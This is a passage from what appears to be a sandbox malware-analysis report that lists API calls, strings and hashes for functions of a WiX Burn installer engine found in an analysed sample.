                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(008E6570,00000008,00000000,008E6C5C,008E6C78,00000000,008E6570,00000000,?,?,?,?,?,?), ref: 0093B7B4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093B7BE
                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),00000004,00000004,?,?,?,?,?,?,?), ref: 0093B807
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093B820
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 0093B876
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to get elevation token from process.$Failed to open process token.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 4040495316-678089218
                                                                                                                                                                                                                                                                            • Opcode ID: 9693309cddb49cac11ccc852cfae74a8b5ab08b67a8ae504ea85b45928bd5eea
                                                                                                                                                                                                                                                                            • Instruction ID: 12152cb69801658410c9bba45188996721ab856a7ac159a991f5256bb3744e5f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9693309cddb49cac11ccc852cfae74a8b5ab08b67a8ae504ea85b45928bd5eea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14219476D41224BBD7219B599C4AFAEBAACEF41750F014055FF19BB290E3748E00DE91
                                                                                                                                                                                                                                                                            Function 008E677F Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(008E6C94,00000000,00000000,00000000,?,?,?,008E7B5B,?,?,00000000,?,?,00000003,00000000,008E6570), ref: 008E67AF
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(008E6C28,?,?,?,008E7B5B,?,?,00000000,?,?,00000003,00000000,008E6570,00000000), ref: 008E67BC
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(008E663C,?,?,?,008E7B5B,?,?,00000000,?,?,00000003,00000000,008E6570,00000000), ref: 008E67D3
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(008E6CEC,008E6C78,008E6C5C,?,?,?,008E7B5B,?,?,00000000,?,?,00000003,00000000,008E6570,00000000), ref: 008E67F8
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B796: OpenProcessToken.ADVAPI32(008E6570,00000008,00000000,008E6C5C,008E6C78,00000000,008E6570,00000000,?,?,?,?,?,?), ref: 0093B7B4
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B796: GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093B7BE
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B796: CloseHandle.KERNELBASE(00000000), ref: 0093B876
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,0095E414,000000FF,008E6C5C,008E6C78,008E6570,?,00000000,?), ref: 0090470C
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 0090472F
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00904752
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E458,000000FF), ref: 00904775
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E45C,000000FF), ref: 00904798
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 009047BB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E688C
                                                                                                                                                                                                                                                                            • Fatal error while parsing command line., xrefs: 008E6824
                                                                                                                                                                                                                                                                            • Failed to initialize internal cache functionality., xrefs: 008E687A
                                                                                                                                                                                                                                                                            • Failed to initialize engine section., xrefs: 008E684D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString$CriticalInitializeSection$Process$CloseCurrentErrorHandleLastOpenToken
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize engine section.$Failed to initialize internal cache functionality.$Fatal error while parsing command line.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 268551788-2320754317
                                                                                                                                                                                                                                                                            • Opcode ID: f33b9627ff7400dbab281e73d04b2136f2fdf9be16a7c4e25bc5e11f73f0db6a
                                                                                                                                                                                                                                                                            • Instruction ID: 33e5cb30fbbc4781350c078d921d265a50db8e6ec3b769e226074f12d6a52d4d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f33b9627ff7400dbab281e73d04b2136f2fdf9be16a7c4e25bc5e11f73f0db6a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA314175941215BBDF11DFA5CC89FDA3BACFF49750F040276BE18EB185E6B0A5048BA0
                                                                                                                                                                                                                                                                            Function 00902BBD Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,00000000,00000000,?,00000000,?), ref: 00902BF1
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00902C80
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                                                                            • String ID: -%ls=%Iu$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self$d:\a\wix4\wix4\src\burn\engine\core.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3498533004-1973934485
                                                                                                                                                                                                                                                                            • Opcode ID: 486ae2b4844041469ebd2f0f4173f186ef8719114c8f9eec77aa5156c76ba343
                                                                                                                                                                                                                                                                            • Instruction ID: bf7714e5d486933cb73e06f8267d3d419da54283eee7cf8be68ed3872c8779f9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 486ae2b4844041469ebd2f0f4173f186ef8719114c8f9eec77aa5156c76ba343
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B11D331A80324BAE721AF5A8C0EF9F3E6CAB82B75F100341FD64B61D1E2B006558792
                                                                                                                                                                                                                                                                            Function 0094058B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0094059B
                                                                                                                                                                                                                                                                            • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0097D6D8,?,00000000,008E7C5D,?,?,?,?,?,?), ref: 009405EA
                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0097D6D8,?,?,?,?,?,?), ref: 009405FA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • MSXML.DOMDocument, xrefs: 009405F5
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 009405BB
                                                                                                                                                                                                                                                                            • failed to initialize COM, xrefs: 009405AF
                                                                                                                                                                                                                                                                            • failed to get CLSID for XML DOM, xrefs: 00940606
                                                                                                                                                                                                                                                                            • Msxml2.DOMDocument, xrefs: 009405E5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FromProg$Initialize
                                                                                                                                                                                                                                                                            • String ID: MSXML.DOMDocument$Msxml2.DOMDocument$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to get CLSID for XML DOM$failed to initialize COM
                                                                                                                                                                                                                                                                            • API String ID: 4047641309-3267221515
                                                                                                                                                                                                                                                                            • Opcode ID: eba20f0d3a0f6dc82723e8b7398c2ae6431c55f3cff7f3487d92511c11c5c524
                                                                                                                                                                                                                                                                            • Instruction ID: 093f7914538f31119dd3bead065a44a87033a2ec5ff51a4ca8712483dc8da115
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eba20f0d3a0f6dc82723e8b7398c2ae6431c55f3cff7f3487d92511c11c5c524
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6201AC72BD573037D7311A565C0EF571958EBE1B65F024111BB0DF7180E5B0498096D1
                                                                                                                                                                                                                                                                            Function 00943BE0 Relevance: 13.6, APIs: 5, Strings: 4, Instructions: 135memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000000,00000001,00000000), ref: 00943C09
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000001,00000000), ref: 00943C54
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 00943C98
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0094F890,?,00000000,?,00000000,00000000,00000000), ref: 00943CF6
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00943D48
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to allocate version info for file: %ls$failed to get version info for file: %ls$failed to get version value for file: %ls
                                                                                                                                                                                                                                                                            • API String ID: 1145190524-120110023
                                                                                                                                                                                                                                                                            • Opcode ID: dc394e36d5a7b69e4e9b43dc53429ee3aa44e5d36cf5128f7ab2bdd5ad155fc3
                                                                                                                                                                                                                                                                            • Instruction ID: acbcb377ce9c0bcd1e4d114522142f1ec2ca891803576f690a7710b42c819bc5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc394e36d5a7b69e4e9b43dc53429ee3aa44e5d36cf5128f7ab2bdd5ad155fc3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04411672E40324BBD72196658C46FAF7A6CEF85B50F018115BE44FB2C1E770CE0096E1
                                                                                                                                                                                                                                                                            Function 00941EC9 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 106COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,00000000,000000FF,00000000,00000005,00000000,00000000,00000005,00000000,00000000,00000000,0000001C), ref: 00941F49
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008FF669,?,0000001C,00000000,0000001C,?,00000000,WiX\Burn,PackageCache,00000000,0000001C,00000018,00000000), ref: 00941F53
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareErrorLastString
                                                                                                                                                                                                                                                                            • String ID: Both paths are required.$Failed to canonicalize wzPath1.$Failed to canonicalize wzPath2.$Failed to compare canonicalized paths.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1733990998-2188151180
                                                                                                                                                                                                                                                                            • Opcode ID: cf5378bb64c1b092f088baaacd0b2287b1f74a186b42c0a291c4b0c98de3c442
                                                                                                                                                                                                                                                                            • Instruction ID: bb12ca7baf417984fcba68b77e9be61ecf5e13c775aaa96e82e369e93cfb719a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf5378bb64c1b092f088baaacd0b2287b1f74a186b42c0a291c4b0c98de3c442
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E318F72940328FBDB215695CC4AFBFB96CEF41BA4F118295F904BB1D1E3708D81E6A0
                                                                                                                                                                                                                                                                            Function 008E6305 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 103COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 008E6313
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 008E6321
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                            • String ID: cannot find parent path$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to create path: %ls
                                                                                                                                                                                                                                                                            • API String ID: 1375471231-3388094611
                                                                                                                                                                                                                                                                            • Opcode ID: 5abad9774f12891cf378089c4202e7a0d84fc9d1066838202deb735b68907bce
                                                                                                                                                                                                                                                                            • Instruction ID: 009f6e295b0b50cfd4404c238298700bdc611b24f629075c5de419583b95b029
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5abad9774f12891cf378089c4202e7a0d84fc9d1066838202deb735b68907bce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7210926A442B4A3EB315A574C46F3F6A58FB63BE4F110115FD04EB2C0F2B18C2192D6
                                                                                                                                                                                                                                                                            Function 008E18C0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 89COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: %ls%ls$Failed to create the fully-qualified path to %ls.$Failed to get the Windows system directory.$Failed to load the library %ls.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-242608188
                                                                                                                                                                                                                                                                            • Opcode ID: 0e58856585b092df1fdeb2da56600287cf0bddef8842a2a71b37a03acc2409bd
                                                                                                                                                                                                                                                                            • Instruction ID: bc8768332da5bfb7f10929f4628129d7ec41ebb71ae9cd668da1f30d8836ac65
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e58856585b092df1fdeb2da56600287cf0bddef8842a2a71b37a03acc2409bd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B21E775E40365B7DF21AB968C0EFAE7EA8FF46B14F404055FA04FA2C1E6B19E00D691
                                                                                                                                                                                                                                                                            Function 0094061B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 145COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(008E7D5B), ref: 00940651
                                                                                                                                                                                                                                                                              • Part of subcall function 0093FE01: GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,008E7DDB,?,00940662,00000000,008E7D5B,00000000,?,?,009040B9,?,?,008E7D5B,?), ref: 0093FE1F
                                                                                                                                                                                                                                                                              • Part of subcall function 0093FE01: GetLastError.KERNEL32(?,00940662,00000000,008E7D5B,00000000,?,?,009040B9,?,?,008E7D5B,?,?,?,?,?), ref: 0093FE2B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • failed put_validateOnParse, xrefs: 009406B5
                                                                                                                                                                                                                                                                            • failed loadXML, xrefs: 00940761
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00940683, 009406C4
                                                                                                                                                                                                                                                                            • failed put_resolveExternals, xrefs: 009406F1
                                                                                                                                                                                                                                                                            • failed XmlCreateDocument, xrefs: 00940674
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed loadXML$failed put_resolveExternals$failed put_validateOnParse
                                                                                                                                                                                                                                                                            • API String ID: 52713655-3681987369
                                                                                                                                                                                                                                                                            • Opcode ID: 1ba1ba09ebd56a805ab35b68b6c2cb0c9a07cda6968e54d5bf7587f9a783a34a
                                                                                                                                                                                                                                                                            • Instruction ID: dc1a4b9c74e713e296ce752dd6543078581977e54e82b2264b4abd28509f0a22
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ba1ba09ebd56a805ab35b68b6c2cb0c9a07cda6968e54d5bf7587f9a783a34a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D41B576B40318ABDB05DFA8CC45EDE77B9FF89710F114069F605FB290EA70A9018B95
                                                                                                                                                                                                                                                                            Function 00945F3A Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 125COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,009462A5,00000000,00000000,80000002,00000000,00020019,?,00020019,00000000,00000000,00000000), ref: 00945FBC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to re-allocate more space for expanded path., xrefs: 00946027
                                                                                                                                                                                                                                                                            • Failed to allocate space for expanded path., xrefs: 00945F98
                                                                                                                                                                                                                                                                            • Failed to get max length of input buffer., xrefs: 00945F5F
                                                                                                                                                                                                                                                                            • Failed to expand environment variables in string: %ls, xrefs: 00946052
                                                                                                                                                                                                                                                                            • Failed to get max length of written input buffer., xrefs: 00946016
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\env2util.cpp, xrefs: 00945F6B, 00946044, 00946049, 0094605E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to get max length of written input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\env2util.cpp
